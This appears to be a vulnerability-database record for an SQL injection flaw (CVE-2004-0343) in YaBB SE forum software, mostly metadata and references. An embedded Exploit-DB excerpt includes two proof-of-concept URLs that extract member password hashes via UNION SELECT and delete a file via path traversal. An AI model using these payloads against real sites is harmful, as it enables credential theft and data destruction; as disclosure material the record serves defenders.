Search...

YaBB SE ModifyMessage.php Multiple Parameter SQL Injection

2004-03-01T00:00:00

ID OSVDB:6734
Type osvdb
Reporter OSVDB
Modified 2004-03-01T00:00:00

Description

No description provided by the source

References:

Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107816202813083&w=2 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0002.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0159.html ISS X-Force ID: 15354 CVE-2004-0343 Bugtraq ID: 9774

JSON Vulners Source

Initial Source

{"type": "osvdb", "published": "2004-03-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6734", "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "8b603c882b0a796d321a3a03bd48e17c"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "d0c55a80027893bb0ee0c4a8d1b3d65c"}, {"key": "href", "hash": "335e06caca97f71286e2e8038b469c85"}, {"key": "modified", "hash": "15bfdad54a21e2ea10d5c297cdbc5f6b"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "15bfdad54a21e2ea10d5c297cdbc5f6b"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "4343c10ad34be6ed4e296819881da971"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "viewCount": 0, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "OSVDB", "title": "YaBB SE ModifyMessage.php Multiple Parameter SQL Injection", "affectedSoftware": [], "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "OSVDB:6734", "hash": "21bf7a69609ae31704e1b0ef99941b889f7a59dd2242676142eb2e18bdc0beb0", "lastseen": "2017-04-28T13:20:01", "cvelist": ["CVE-2004-0343"], "modified": "2004-03-01T00:00:00", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=107816202813083&w=2\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0002.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0159.html\nISS X-Force ID: 15354\n[CVE-2004-0343](https://vulners.com/cve/CVE-2004-0343)\nBugtraq ID: 9774\n"}

{"cve": [{"lastseen": "2017-07-11T11:14:24", "references": ["http://www.securityfocus.com/bid/9774", "http://marc.info/?l=bugtraq&m=107816202813083&w=2", "https://exchange.xforce.ibmcloud.com/vulnerabilities/15354"], "description": "Multiple SQL injection vulnerabilities in YaBB SE 1.5.4 through 1.5.5b allow remote attackers to execute arbitrary SQL via (1) the msg parameter in ModifyMessage.php or (2) the postid parameter in ModifyMessage.php.", "edition": 3, "reporter": "NVD", "published": "2004-11-23T00:00:00", "title": "CVE-2004-0343", "type": "cve", "enchantments": {"score": {"modified": "2017-07-11T11:14:24", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2004-0343"], "scanner": [], "modified": "2017-07-10T21:30:05", "cpe": ["cpe:/a:yabb:yabb:1.5.5b::second_edition", "cpe:/a:yabb:yabb:1.5.5::second_edition", "cpe:/a:yabb:yabb:1.5.4::second_edition"], "id": "CVE-2004-0343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0343", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:47:11", "osvdbidlist": ["6734"], "references": [], "edition": 1, "description": "YaBB SE 1.5.x Multiple Parameter SQL Injection. CVE-2004-0343. Webapps exploit for php platform", "reporter": "Alnitak and BackSpace", "published": "2004-03-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "YaBB SE 1.5.x - Multiple Parameter SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0343"], "modified": "2004-03-01T00:00:00", "id": "EDB-ID:23775", "href": "https://www.exploit-db.com/exploits/23775/", "sourceData": "source: http://www.securityfocus.com/bid/9774/info\r\n \r\nIt has been reported that YaBB SE may be prone to multiple vulnerabilities due to improper input validation. The issues may allow an attacker to carry out SQL injection and directory traversal attacks. Successful exploitation of these issues may allow an attacker to gain access to sensitive information that may be used to mount further attacks against a vulnerable system. The SQL injection vulnerabilities can be exploited to gain access to user authentication credentials and corrupt user information in the underlying database.\r\n \r\nYaBB SE versions 1.5.4, 1.5.5, and 1.5.5b are reported to be affected by these issues, however it is possible that other versions are vulnerable as well.\r\n\r\nhttp://www.example.com/forum/index.php?board=1;action=modify;threadid=1;quote=1;start=0;sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,concat(passwd,%27-%2\r\n7,secretQuestion),null,null,null,null,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*\r\n\r\nhttp://www.example.com/forum/index.php?board=1;action=modify2;delAttach=on;attachOld=../../../../d\r\neleteme.txt;subject=hola;message=hola;postid=-1+UNION+SELECT+null,3,null,nul\r\nl,null,null,null,null,null,null,null,null/* HTTP/1.0", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/23775/"}]}